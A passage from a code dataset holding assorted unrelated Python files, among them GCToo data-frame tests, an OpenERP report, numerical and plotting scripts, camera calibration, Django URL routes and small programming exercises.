self.assertRaises(AssertionError) as e:\n GCToo.GCToo(data_df=not_unique_data_df)\n self.assertIn(\"'a' 'b' 'a'\", str(e.exception))\n\n # rhds are not unique in row_metadata_df\n with self.assertRaises(AssertionError) as e:\n GCToo.GCToo(row_metadata_df=not_unique_rhd)\n self.assertIn(\"'rhd1' 'rhd1'\", str(e.exception))\n\n def test_rid_consistency_check(self):\n data_df = pd.DataFrame([[1, 2, 3], [4, 5, 6]],\n index=[\"A\", \"B\"], columns=[\"a\", \"b\", \"c\"])\n inconsistent_rids = pd.DataFrame([[\"rhd_A\", \"rhd_B\"], [\"rhd_C\", \"rhd_D\"]],\n index=[\"A\", \"C\"], columns=[\"rhd1\", \"rhd2\"])\n with self.assertRaises(AssertionError) as e:\n GCToo.GCToo.rid_consistency_check(GCToo.GCToo(\n data_df=data_df, row_metadata_df=inconsistent_rids))\n self.assertIn(\"The rids are inconsistent\", str(e.exception))\n\n def test_cid_consistency_check(self):\n data_df = pd.DataFrame([[1, 2, 3], [4, 5, 6]],\n index=[\"A\", \"B\"], columns=[\"a\", \"b\", \"c\"])\n inconsistent_cids = pd.DataFrame([\"chd_a\", \"chd_b\", \"chd_c\"],\n index=[\"a\", \"b\", \"C\"], columns=[\"chd1\"])\n with self.assertRaises(AssertionError) as e:\n GCToo.GCToo.cid_consistency_check(GCToo.GCToo(\n data_df=data_df, col_metadata_df=inconsistent_cids))\n self.assertIn(\"The cids are inconsistent\", str(e.exception))\n\n def test_multi_index_df_to_component_dfs(self):\n mi_df_index = pd.MultiIndex.from_arrays(\n [[\"D\", \"E\"], [-666, -666], [\"dd\", \"ee\"]],\n names=[\"rid\", \"rhd1\", \"rhd2\"])\n mi_df_columns = pd.MultiIndex.from_arrays(\n [[\"A\", \"B\", \"C\"], [1, 2, 3], [\"Z\", \"Y\", \"X\"]],\n names=[\"cid\", \"chd1\", \"chd2\"])\n mi_df = pd.DataFrame(\n [[1, 3, 5], [7, 11, 13]],\n index=mi_df_index, columns=mi_df_columns)\n\n e_row_metadata_df = pd.DataFrame(\n [[-666, \"dd\"], [-666, \"ee\"]],\n index=pd.Index([\"D\", \"E\"], name=\"rid\"),\n columns=pd.Index([\"rhd1\", \"rhd2\"], name=\"rhd\"))\n e_col_metadata_df = pd.DataFrame(\n [[1, \"Z\"], [2, \"Y\"], [3, \"X\"]],\n index=pd.Index([\"A\", \"B\", \"C\"], name=\"cid\"),\n columns=pd.Index([\"chd1\", \"chd2\"], name=\"chd\"))\n e_data_df = pd.DataFrame(\n [[1, 3, 5], [7, 11, 13]],\n index=pd.Index([\"D\", \"E\"], name=\"rid\"),\n columns=pd.Index([\"A\", \"B\", \"C\"], name=\"cid\"))\n\n (data_df, row_df, col_df) = GCToo.multi_index_df_to_component_dfs(mi_df)\n\n self.assertTrue(col_df.equals(e_col_metadata_df))\n self.assertTrue(row_df.equals(e_row_metadata_df))\n self.assertTrue(data_df.equals(e_data_df))\n\nif __name__ == \"__main__\":\n setup_GCToo_logger.setup(verbose=True)\n\n unittest.main()\n\n","sub_path":"python/broadinstitute_cmap/io/GCToo/test_GCToo.py","file_name":"test_GCToo.py","file_ext":"py","file_size_in_byte":5708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"483100994","text":"# -*- encoding: utf-8 -*-\n##############################################################################\n#\n# Copyright (c) 2007 - 2009 Corvus Latinoamerica, C.A. (http://corvus.com.ve) All Rights Reserved\n# \n#\n# WARNING: This program as such is intended to be used by professional\n# programmers who take the whole responsability of assessing all potential\n# consequences resulting from its eventual inadequacies and bugs \n# End users who are looking for a ready-to-use solution with commercial\n# garantees and support are strongly adviced to contract a Free Software\n# Service Company \n#\n# This program is Free Software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the \n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.\n#\n##############################################################################\n\nfrom report import report_sxw\nfrom osv import osv\nimport pooler\n\nclass partner_bycategory(report_sxw.rml_parse):\n\n\tdef __init__(self, cr, uid, name, context):\n\t\tsuper(partner_bycategory, self).__init__(cr, uid, name, context)\n\t\tself.localcontext.update({\n\t\t\t'get_partner_information': self._get_partner_information,\n\t\t})\n\t\n\t\t\n\tdef _get_partner_information(self,category_id,subcateg):\n\t\tresp = []\n\t\tif category_id: \n\t\t\tids_str = category_id\n\t\t\tif subcateg: \n\t\t\t\tcatg_ids = self.pool.get('res.partner.category').search(self.cr, self.uid, [('parent_id', 'child_of', [category_id])])\t\t\t\n\t\t\t\tids_str = ','.join(map(str,catg_ids))\t\t \n\t\t\tsql = \"\"\"\t\n\t\t\tSELECT\tc.id,c.name,p.name,p.vat\n\t\t\tFROM\t\tres_partner_category_rel AS r \n\t\t\tINNER JOIN res_partner AS p ON r.partner_id=p.id \n\t\t\tINNER JOIN res_partner_category AS c ON r.category_id=c.id \n\t\t\tWHERE\tr.category_id in ( %s ) \n\t\t\tORDER BY c.name,p.name;\"\"\" %ids_str\n\t\t\t#print sql \n\t\t\tself.cr.execute(sql)\n\t\t\tcatg_id = 0\n\t\t\tfor reg in self.cr.fetchall():\n\t\t\t\tif catg_id==reg[0]: \n\t\t\t\t\tresp.append({\"catg\":'',\"nomb\":reg[2],\"rif\":reg[3]})\n\t\t\t\telse:\n\t\t\t\t\tcatg_id = reg[0]\n\t\t\t\t\tresp.append({\"catg\":reg[1],\"nomb\":reg[2],\"rif\":reg[3]})\n\t\treturn resp\n\nreport_sxw.report_sxw('report.partner_by_category','res.partner','addons/custom_american/custom_partner/report/report_partner_category.rml',parser=partner_bycategory, header=False )\n","sub_path":"custom_partner/report/report_partner_category.py","file_name":"report_partner_category.py","file_ext":"py","file_size_in_byte":2762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"238226705","text":"import math\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef cauchy(x):\n return 1.0 / (math.pi * (1 + x**2) )\n\ninputs = open(\"inputs.txt\")\nnvec = [ n.strip(\"\\n\") for n in inputs.readlines()[1:] ]\n\nfor n in nvec:\n fname = \"n\" + n + \"histogram.out\"\n data = np.loadtxt(fname)\n\n delta_x = data[1,0] - data[0,0]\n normalisation = np.sum(data[:,1], dtype=np.float)\n\n cauchy_data = cauchy(data[:,0])\n cauchy_normalisation = np.sum(cauchy_data, dtype=np.float)\n \n plt.figure(n)\n plt.xlabel(r\"$x$\")\n plt.ylabel(\"Probability\")\n plt.title(\"Sampling: $n = $\"+n)\n\n plt.bar(data[:,0], data[:,1]/normalisation, width=delta_x, label=\"Sampled\") # plot Metroplis data\n plt.plot(data[:,0], cauchy_data/cauchy_normalisation, 'r-', label=\"Exact\") # plot actual Cauchy pdf\n plt.legend()\n\n\nplt.show()\n","sub_path":"Assignment3/plot_histogram.py","file_name":"plot_histogram.py","file_ext":"py","file_size_in_byte":831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"580268378","text":"import scipy\nfrom scipy.misc import derivative\nimport math\n\n'''Newton-Raphson method\n f is a function\n {derivative(f, a, dx=1e-6)} the derivative of f at a\n a is the left end point xn'''\n\nmaxItr = 100\ndef f(x):\n return x**2 - 10*x +23 \n\n\ndef newtonRaph(a):\n iteration = 0\n a += 0.1\n while iteration<maxItr:\n x = a - f(a)/derivative(f, a, dx=1e-6)\n iteration+=1\n print(\"iteration number =\",iteration)\n if f(x) == 0:\n print(\"the zero is\",x)\n break\n else:\n a = x\n \n return x\n \ndef main(a):\n newtonRaph(a)\n\n","sub_path":"newton_raphson.py","file_name":"newton_raphson.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"499938603","text":"import os\nos.chdir('C:/Users/LUIJK01/Documents/GitHub/image_recognition_cifar10')\n# os.chdir('/Users/rluijk/Documents/image_recognition_cifar10')\n\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\n\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.linear_model import LogisticRegression\n\n\n# read data\n# x = np.loadtxt(fname = 'x.txt', delimiter = ',')\n# x_scaled = np.loadtxt(fname = 'x_scaled.txt', delimiter = ',')\npcs = np.loadtxt(fname = 'pcs.txt', delimiter = ',')\nlabels = pd.read_csv('labels.txt', sep='\\t')\ny = {}\nunique_labels = labels.label.unique()\nfor x in zip(range(len(unique_labels)), unique_labels):\n y[x[1]] = x[0]\ny = [y[label] for label in labels['label']]\n\n# split in train train_test_split\nx_train, x_test, y_train, y_test = train_test_split(x, y, train_size = 0.8, random_state = 0)\n\n# parameters\nparams = {\n 'penalty': ['l1'],\n 'C': np.linspace(1, 25, num = 20) # smaller is stronger regularization\n}\n\n# initialize object\nclf = GridSearchCV(estimator = LogisticRegression(), param_grid = params)\n\n# fit data\nclf.fit(X = x_train, y = y_train)\n\n# best parameters\nprint(clf.best_params_) # {'C': 2.263157894736842, 'penalty': 'l1'}\n\n# all parameters and accuracies\ndf = pd.DataFrame({\n 'C': [x['C'] for x in clf.cv_results_['params']],\n 'score': clf.cv_results_['mean_test_score']\n})\nprint(df)\n\nsns.pointplot(x = 'C', y = 'score', data = df)\n\nypred = clf.predict(X = x_test)\nprint(np.mean(ypred == y_test)) # 0.811\n","sub_path":"logistic_regression.py","file_name":"logistic_regression.py","file_ext":"py","file_size_in_byte":1526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"514577513","text":"import argparse\n\nimport cv2 as cv\nimport numpy as np\n\nfrom util.camera import Camera\n\ndef chessboard_size(s):\n try:\n w,h = map(int, s.split(\"x\"))\n return w,h\n except:\n raise argparse.ArgumentTypeError(\"Chessboard size must be WxH (number of inner corners)\")\n\ndef field_size(s):\n try:\n try:\n w = float(w)\n return w, w\n except:\n w,h = map(float, s.split(\"x\"))\n return w,h\n except:\n raise argparse.ArgumentTypeError(\"Field size must be WxH or W (interpreted as H=W) [mm]\")\n\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Determine camera intrinsics and store to file.')\n parser.add_argument('--grid-size', type=chessboard_size, default=(7,9), help='Chessboard size (# inner corners)')\n parser.add_argument('--field-size', type=field_size, default=(22.75, 24.375), help='Size of one grid field [mm]')\n\n args = parser.parse_args()\n\n cam = cv.VideoCapture(0)\n cam.set(cv.CAP_PROP_FRAME_WIDTH, 1280)\n cam.set(cv.CAP_PROP_FRAME_HEIGHT, 720)\n cam.set(cv.CAP_PROP_FOURCC, cv.VideoWriter_fourcc(*'MJPG'))\n cam.set(cv.CAP_PROP_FPS, 60)\n\n imgpoints = []\n objpoints = []\n objp = np.zeros((args.grid_size[0]*args.grid_size[1], 3), dtype=np.float32)\n objp[:,:2] = np.mgrid[0:args.grid_size[0], 0:args.grid_size[1]].T.reshape(-1,2)*args.field_size\n\n while True:\n good, img = cam.read()\n if not good:\n break\n img = cv.flip(img, 1)\n grey = cv.cvtColor(img, cv.COLOR_BGR2GRAY)\n found, corners = cv.findChessboardCorners(\n grey, args.grid_size,\n flags = cv.CALIB_CB_FAST_CHECK | cv.CALIB_CB_ADAPTIVE_THRESH)\n cv.drawChessboardCorners(img, args.grid_size, corners, found)\n cv.imshow('Calibration', img)\n\n key = cv.waitKey(15) & 255\n\n if key == ord(' '):\n if found:\n corners = cv.cornerSubPix(\n grey, corners,\n (11, 11), (-1, -1),\n (cv.TERM_CRITERIA_EPS | cv.TERM_CRITERIA_MAX_ITER,\n 30, 0.001))\n objpoints.append(objp)\n imgpoints.append(corners)\n\n if key == 27:\n break\n\n ret, matrix, dist, rvecs, tvecs = cv.calibrateCamera(objpoints, imgpoints, grey.shape[::-1], None, None)\n cam = Camera(matrix, dist)\n cam.save('calibration_params')\n print(cam)\n\n\n\n\n\n","sub_path":"src/calibrate.py","file_name":"calibrate.py","file_ext":"py","file_size_in_byte":2510,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"38711694","text":"# Copyright 2018 Johns Hopkins University (author: Daniel Povey, Desh Raj, Adel Rahimi)\n# Hossein Hadian\n# Yiwen Shao\n\n# Apache 2.0\nimport matplotlib\nmatplotlib.use('Agg')\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom PIL import Image\nfrom io import BytesIO\nimport operator\nfrom scipy import ndimage\nfrom waldo.data_types import *\n\n\ndef visualize_mask(x, c, transparency=0.7, show_labels=True):\n \"\"\"\n This function accepts an object x that should represent an image with a\n mask, a config class c, and a float 0 < transparency < 1.\n It changes the image in-place by overlaying the mask with transparency\n described by the parameter.\n x['img_with_mask'] = image with transparent mask overlay\n \"\"\"\n validate_image_with_mask(x, c)\n im = x['img']\n mask = x['mask']\n plt.clf()\n plt.imshow(im)\n for i in range(1, mask.max() + 1):\n b_mask = (mask == i)\n base_img = np.ones((b_mask.shape[0], b_mask.shape[1], 3))\n color = np.random.random((1, 3)).tolist()[0]\n for k in range(3):\n base_img[:, :, k] = color[k]\n plt.imshow(np.dstack((base_img, b_mask * transparency)))\n if show_labels:\n center = np.round(ndimage.measurements.center_of_mass(b_mask))\n plt.text(center[1] - 2, center[0] + 2, '{}'.format(i), fontsize=7,\n color=color, bbox=dict(facecolor='white',\n edgecolor='none', pad=0))\n\n plt.subplots_adjust(0, 0, 1, 1)\n buffer_ = BytesIO()\n plt.savefig(buffer_, format=\"png\")\n buffer_.seek(0)\n image = Image.open(buffer_)\n x['img_with_mask'] = np.array(image)\n buffer_.close()\n return x\n\n\ndef visualize_polygons(x):\n \"\"\"This function accepts an object x that should represent an image with\n polygonal objects and it modifies the image to superimpose the edges of\n the polygon on it.\n This function returns None; it modifies x in-place.\n \"\"\"\n validate_image_with_objects(x)\n # ... do something, modifying x somehow\n return None\n","sub_path":"scripts/waldo/data_visualization.py","file_name":"data_visualization.py","file_ext":"py","file_size_in_byte":2113,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"633050459","text":"# www.NeatChange.com\n# Make a difference in your life !\n#\n# Poplar Oct 22 2017\n# 文件后缀名\n\n\"\"\"\n\n时间限制:1秒 空间限制:32768K\n\n\n题目描述:\nPlease create a function to extract the filename extension from the given path,\nreturn the extracted filename extension or null if none.\n\n\n输入描述:\n输入数据为一个文件路径\n\n\n输出描述:\n对于每个测试实例,要求输出对应的filename extension\n\n\n示例:\n\n输入\nAbc/file.txt\n\n输出\ntxt\n\n\"\"\"\n\nx = input().strip()\nif '.' in x:\n print(x.split('.')[-1])\nelse:\n print(\"null\")\n\n'''\n运行时间:44ms 占用内存:5104k\n'''","sub_path":"Study/Notes/Algorithm/12.文件后缀名.py","file_name":"12.文件后缀名.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"548428492","text":"from __future__ import (division, absolute_import, print_function,\n unicode_literals)\nfrom builtins import * # NOQA\nfrom future.standard_library import install_aliases\ninstall_aliases() # NOQA\n\nimport json\nimport pkg_resources\n\nimport jsonschema\n\n\ndef validate(doc, schema):\n \"\"\"Validate a document against a schema.\n\n This function ensures that additional format checkers (for datetime\n and URIs) are active.\n \"\"\"\n format_checker = jsonschema.FormatChecker()\n jsonschema.validate(doc, schema, format_checker=format_checker)\n\n\ndef load_schema(schema):\n \"\"\"Load JSON schema for a SQUASH metric upload.\"\"\"\n data = pkg_resources.resource_string(__name__,\n 'schemas/{}.json'.format(schema))\n return json.loads(data.decode('utf-8'))\n\n\ndef load_squash_measurements_schema():\n \"\"\"Load JSON schema for the **measurements** object in a SQUASH job upload.\n \"\"\"\n job_schema = load_schema(schema='job')\n\n m_schema = {\n \"$schema\": \"http://json-schema.org/draft-04/schema#\",\n \"title\": \"SQUASH Job upload schema\",\n \"description\": \"This JSON schema applies POST https://squash.lsst.codes/api/jobs.\", # noqa\n }\n m_schema['definitions'] = job_schema['definitions']\n m_schema.update(job_schema['definitions']['measurements'])\n\n return m_schema\n\n\ndef load_squash_packages_schema():\n \"\"\"Load JSON schema for the **packages** object in a SQUASH job upload.\n \"\"\"\n job_schema = load_schema(schema='job')\n\n m_schema = {\n \"$schema\": \"http://json-schema.org/draft-04/schema#\",\n \"title\": \"SQUASH Job upload schema\",\n \"description\": \"This JSON schema applies POST https://squash.lsst.codes/api/jobs.\", # noqa\n }\n m_schema['definitions'] = job_schema['definitions']\n m_schema.update(job_schema['definitions']['packages'])\n\n return m_schema\n","sub_path":"postqa/schemas.py","file_name":"schemas.py","file_ext":"py","file_size_in_byte":1894,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"277195873","text":"import re\n\ndataSet = \"data_small.txt\"\ndataList = []\ncollectedText = []\nnames = []\nstrain = []\npercent = []\nterp1 = []\nterp2 = []\nterp3 = []\nprice = []\n\n\ndef openFile():\n global dataList\n global dataSet\n print(\"Open File!\")\n file = open(dataSet, \"r\")\n # print(file.read())\n\n for line in file:\n print(line)\n dataList.append(line)\n\n\n# Finds the location of where the text splice\ndef returnSpaceIndex(dataList, lineSpace, newData, phase):\n print(\"space index Function\")\n currentLetter = \"\"\n currentSpace = 0\n\n # Checks for a space\n if phase == 1:\n for line in range(0, len(dataList)):\n for letter in range(0, len(dataList[line])):\n currentLetter = dataList[line][letter]\n if currentLetter == \" \":\n # currentSpace = letter\n lineSpace.append(letter)\n break\n\n # Checks for percentasge (\"00.00%\")\n elif phase == 2:\n print(\"RE Line space function phase 2!\")\n global percent\n global strain\n temp = []\n for line in range(0, len(newData)):\n newText = newData[line]\n # Searches for 00.00% using regex\n returnedText = re.search(\"\\d\\d[.]\\d\\d[%]\", newText)\n returnedIter = re.split(r\"\\d\\d[.]\\d\\d[%]\", newText)\n # print(returnedText)\n percent.append(returnedText.group(0))\n strain.append(returnedIter[0])\n temp.append(returnedIter[1])\n\n # Deletes newData to refill it again with temp\n del newData[:]\n # Refill NewData\n for i in range(0, len(temp)):\n # print(temp[i])\n newData.append(temp[i])\n\n # Check for comma instead of space\n elif phase == 3 or phase == 4:\n for line in range(0, len(newData)):\n for letter in range(0, len(newData[line])):\n currentLetter = newData[line][letter]\n if currentLetter == \",\":\n # currentSpace = letter\n lineSpace.append(letter)\n break\n\n # Check for price (\"$00\")\n elif phase == 5:\n global price\n global terp3\n for line in range(0, len(newData)):\n try:\n newText = newData[line]\n # print(newData[line])\n returnedText = re.search(r\"[$]\\d\\d\", newText)\n returnedIter = re.split(r\"[$]\\d\\d]\", newText)\n # print(returnedText.group(0))\n terp3.append(returnedIter[0][1:2])\n # print(returnedIter[0][:2])\n price.append(returnedText.group(0))\n print(\"Price spliced successfully\")\n except Exception as e:\n print(\"Error in Phase 5: \", e)\n # Shouldn't run, but if issue in initial data, then check for space\n else:\n for line in range(0, len(newData)):\n for letter in range(0, len(newData[line])):\n currentLetter = newData[line][letter]\n if currentLetter == \" \":\n # currentSpace = letter\n lineSpace.append(letter)\n break\n\n\n# Splice the text based off of data return from spaceIndex function and add formatted text to staging list\ndef appendToList(dataList, lineSpace, newData, phase):\n print(\"Append Function\")\n global collectedText\n tempList = []\n for line in range(0, len(newData)):\n # tempList.append(newData[line][(lineSpace[line]):])\n tempList.append(newData[line][(lineSpace[line]):])\n if phase == 1:\n for line in range(0, len(dataList)):\n print(\"Collected text function 1: \", dataList[line][:(lineSpace[line] + 3)])\n collectedText.append(dataList[line][0:(lineSpace[line] + 3)])\n print(\"Collected new data function 1: \", (dataList[line][(lineSpace[line] + 3):]))\n newData.append(dataList[line][(lineSpace[line] + 3):])\n else:\n for line in range(0, len(newData)):\n print(\"Collected text function: \", newData[line][0:(lineSpace[line])])\n collectedText.append(newData[line][0:(lineSpace[line])])\n\n print(\"Collected new tempList function: \", (tempList[line][(lineSpace[line] + 3):]))\n # newData.append(dataList[line][(lineSpace[line] + 3):])\n\n # print(\"Collected text function: \", newData[line][(lineSpace[line]):])\n # collectedText.append(newData[line][(lineSpace[line]):])\n newLen = len(newData)\n del newData[:]\n for line in range(0, newLen):\n print(\"Collected new data function: \", (tempList[line][(lineSpace[line]):]))\n newData.append(tempList[line][(lineSpace[line]):])\n\n\ndef appendToNewList(dataList, lineSpace, newData):\n print(\"Append to new list Function\")\n print(\"Append to new list\")\n for line in range(0, len(dataList)):\n print(\"Collected text function: \", dataList[line][:(lineSpace[line])])\n collectedText.append(dataList[line][:(lineSpace[line])])\n\n\n# Appends data to GLOBAL lists based off of phase and then deletes data for reuse\ndef deleteData(dataList, tempData, lineSpace, phase):\n global names, strain, percent, terp1, terp2, terp3, price, collectedText\n print(\"Delete Phase: \", phase) # Current Phase print\n # Everything else besides the \" - \" so \" -\" and \" \"\n for line in range(0, len(collectedText)):\n print(\"First CollectedText to be Deleted: \", collectedText[line])\n # del newData[:]\n if phase == 1:\n # append name to global var\n names.append(collectedText[line])\n if phase == 3:\n # add new data to newData list\n terp1.append(collectedText[line])\n if phase == 4:\n # add new data to newData list\n terp2.append(collectedText[line])\n if phase == 5:\n # add new data to newData list\n terp3.append(collectedText[line])\n del collectedText[:]\n del lineSpace[:]\n # collectedText.append(collectedText[line][lineSpace[line]:])\n\n # Transfer new data to temp, then delete collectedText for use again\n # if line == len(collectedText)-1:\n # for line in range(0, len(collectedText)):\n # tempData.append(collectedText[line])\n # print(\"Temp data: \" + tempData[line])\n\n # for line in range(0, len(collectedText)):\n # collectedText.append(tempData[line][lineSpace[line]:])\n\n\n# Cleaning Data function\ndef cleanData():\n global dataList\n global names\n lineSpace = []\n tempData = []\n newData = []\n phase = 0\n\n print(\"Start data cleaning...\")\n phases = [1, 2, 3, 4, 5]\n\n for phaseNumber in phases:\n print(\"Phase \" + str(phaseNumber))\n returnSpaceIndex(dataList, lineSpace, newData, phaseNumber)\n if phaseNumber != 2 and phaseNumber != 5:\n print(\"Append/Delete \" + str(phaseNumber))\n appendToList(dataList, lineSpace, newData, phaseNumber)\n deleteData(dataList, tempData, lineSpace, phaseNumber)\n\n # del collectedText[:]\n\n\n# print(currentLetter)\n# print(currentSpace)\n\n\ndef testFunction():\n print(\"START TEST FUNCTION:\")\n\n print(names[0])\n print(strain[0])\n print(percent[0])\n print(terp1[0])\n print(terp2[0])\n print(terp3[0])\n print(price[0])\n\n dataDictionary = {\"Company\": \"test\", \"Strain\": \"GG\", \"THC\": \"69.42%\", \"Terp1\": \"C\", \"Terp2\": \"H\", \"Terp3\": \"M\",\n \"Price\": \"$55\"}\n # print(dataDictionary)\n\n\nopenFile()\ncleanData()\ntestFunction()\n","sub_path":"terpsAnalysis - Staging.py","file_name":"terpsAnalysis - Staging.py","file_ext":"py","file_size_in_byte":7558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"389372424","text":"import numpy as np\nimport struct\nimport skimage.io\nimport matplotlib.pyplot as plt\nfrom matplotlib.patches import ConnectionPatch\n\nfilename = \"/DL_data/MPI-Sintel-complete/training/flow/ambush_2/frame_0003.flo\"\nimg1 = skimage.io.imread(\"/DL_data/MPI-Sintel-complete/training/albedo/ambush_2/frame_0003.png\")\nimg2 = skimage.io.imread(\"/DL_data/MPI-Sintel-complete/training/albedo/ambush_2/frame_0004.png\")\n\n# img1 = skimage.io.imread(\"/DL_data/MPI-Sintel-complete/training/albedo/alley_1/frame_0001.png\")\n# img2 = skimage.io.imread(\"/DL_data/MPI-Sintel-complete/training/albedo/alley_1/frame_0002.png\")\n\nbinFile = open(filename, 'rb')\ntag = binFile.read(4)\nprint(tag)\nwidth = struct.unpack('i', binFile.read(4))[0]\nheight = struct.unpack('i', binFile.read(4))[0]\nchannel = 2\nprint(width, height)\n\nflow = np.zeros((height, width, channel))\n\nfor i in range(height):\n\tfor j in range(width):\n\t\tfor k in range(channel):\n\t\t\tval = struct.unpack('f', binFile.read(4))[0]\n\t\t\tflow[i][j][k] = val\n\n# print(flow)\nfig = plt.figure(figsize=(8,8))\nax1 = fig.add_subplot(211)\nplt.imshow(img1)\n\nax2 = fig.add_subplot(212)\nplt.imshow(img2)\n\n# print(np.random.randint(100));exit()\ncolors = \"bcgkmry\"\nfor i in range(height):\n\tfor j in range(width):\n\t\tif(np.random.randint(5000) < 1):\n\t\t\tcon = ConnectionPatch(xyA=(int(j + flow[i][j][0]), int(i + flow[i][j][1])), xyB=(j, i), coordsA=\"data\", coordsB=\"data\",\n\t\t\t axesA=ax2, axesB=ax1, color=colors[np.random.randint(len(colors))])\n\t\t\tax2.add_artist(con)\n\n# print(flow[300][200][0], flow[300][200][1])\n# con = ConnectionPatch(xyA=(int(300 + flow[200][300][0]), int(200 + flow[200][300][1])), xyB=(300, 200), coordsA=\"data\", coordsB=\"data\",\n# \t\t\t axesA=ax2, axesB=ax1, color=\"red\")\n# ax2.add_artist(con)\n\nplt.show()\n\n\ndef readflo(filename):\n\tbinFile = open(filename, 'rb')\n\ttag = binFile.read(4)\n\t# print(tag)\n\twidth = struct.unpack('i', binFile.read(4))[0]\n\theight = struct.unpack('i', binFile.read(4))[0]\n\tchannel = 2\n\t# print(width, height)\n\n\tflow = np.zeros((height, width, channel))\n\n\tfor i in range(height):\n\t\tfor j in range(width):\n\t\t\tfor k in range(channel):\n\t\t\t\tval = struct.unpack('f', binFile.read(4))[0]\n\t\t\t\tflow[i][j][k] = val\n\treturn flow\n","sub_path":"readflo.py","file_name":"readflo.py","file_ext":"py","file_size_in_byte":2220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"410149351","text":"from django.conf.urls import *\nfrom admin_server_app import views\nimport project_ydyw.settings\n# from .views import UserInfoUpdate\nfrom admin_server_app.views import login\nfrom django.contrib.auth import views as user_views\nfrom django.conf.urls.static import static\nfrom django.conf import settings\nurlpatterns = [\n url(r'^$', views.login),\n url(r'^login/$',views.login),\n url(r'^index/$',views.index),\n url(r'^logout/$',views.logout),\n url(r'^user/list/$',views.userList, name='user_list'),\n url(r'^user/list/(.+)/$',views.userList,name='user_listcc'),\n url(r'^user/$',views.userList),\n url(r'^user/add/$',views.userAdd),\n url(r'^user/alter/(.+)/$',views.userAlter,name='user_alter'),\n # url(r'^user/alter/(?P<id>\\d+)/$', UserInfoUpdate.userAlter,name='user_alter'),\n # url(r'^user/alter/(.+)/$', UserInfoUpdate.userAlter,name='user_alter'),\n url(r'^cmdb/serverlist/$',views.serverList, name='server_list'),\n url(r'^cmdb/serverlist/(.+)/$',views.serverList,name='server_listcc'),\n url(r'^cmdb/serveradd/$',views.serverAdd, name='server_add'),\n url(r'^cmdb/hostadmin/$',views.hostAdmin, name='hostadmin'),\n url(r'^cmdb/monitor/$',views.getMonitor, name='monitor'),\n url(r'^cmdb/$',views.serverList),\n #url(r'^static/(?P<path>.*)$', 'django.views.static.serve',{'document_root': project_ydyw.settings.STATIC_ROOT }),\n] + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)\n\n","sub_path":"admin_server_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"52446002","text":"import zope.i18nmessageid\nfrom AccessControl.Permissions import manage_users as ManageUsers\nfrom Products.PluggableAuthService.PluggableAuthService import \\\n registerMultiPlugin\n\nMessageFactory = zope.i18nmessageid.MessageFactory('pmr2.oauth')\n\nfrom plugins import oauth\n\n\nregisterMultiPlugin(oauth.OAuthPlugin.meta_type)\n\ndef initialize(context):\n # XXX should validate whether we have SSL installed.\n\n context.registerClass(oauth.OAuthPlugin,\n permission=ManageUsers,\n constructors=(\n oauth.manage_addOAuthPlugin,\n oauth.addOAuthPlugin,\n ),\n visibility=None,\n icon=\"icon/oauth.png\"\n )\n","sub_path":"pmr2/oauth/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"244515458","text":"# A rectangle is represented as a list [x1, y1, x2, y2], where (x1, y1) are the coordinates\n#\n# of its bottom-left corner, and (x2, y2) are the coordinates of its top-right corner.\n#\n# Two rectangles overlap if the area of their intersection is positive. To be clear, two\n# rectangles that only touch at the corner or edges do not overlap.\n#\n# Given two (axis-aligned) rectangles, return whether they overlap.\n#\n# Example 1:\n#\n# Input: rec1 = [0,0,2,2], rec2 = [1,1,3,3]\n# Output: true\n# Example 2:\n#\n# Input: rec1 = [0,0,1,1], rec2 = [1,0,2,1]\n# Output: false\n\n\nclass Solution:\n def isRectangleOverlap(self, rec1, rec2):\n \"\"\"\n :type rec1: List[int]\n :type rec2: List[int]\n :rtype: bool\n \"\"\"\n if rec1[0] >= rec2[2]:\n return False\n if rec1[2] <= rec2[0]:\n return False\n if rec1[1] >= rec2[3]:\n return False\n if rec1[3] <= rec2[1]:\n return False\n\n return True\n\n\nif __name__ == '__main__':\n solution = Solution()\n print(solution.isRectangleOverlap([0, 0, 2, 2], [1, 1, 3, 3]))","sub_path":"836_Rectangle_Overlap.py","file_name":"836_Rectangle_Overlap.py","file_ext":"py","file_size_in_byte":1097,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"551792327","text":"from Day3.Grid import Grid\nfrom collections import 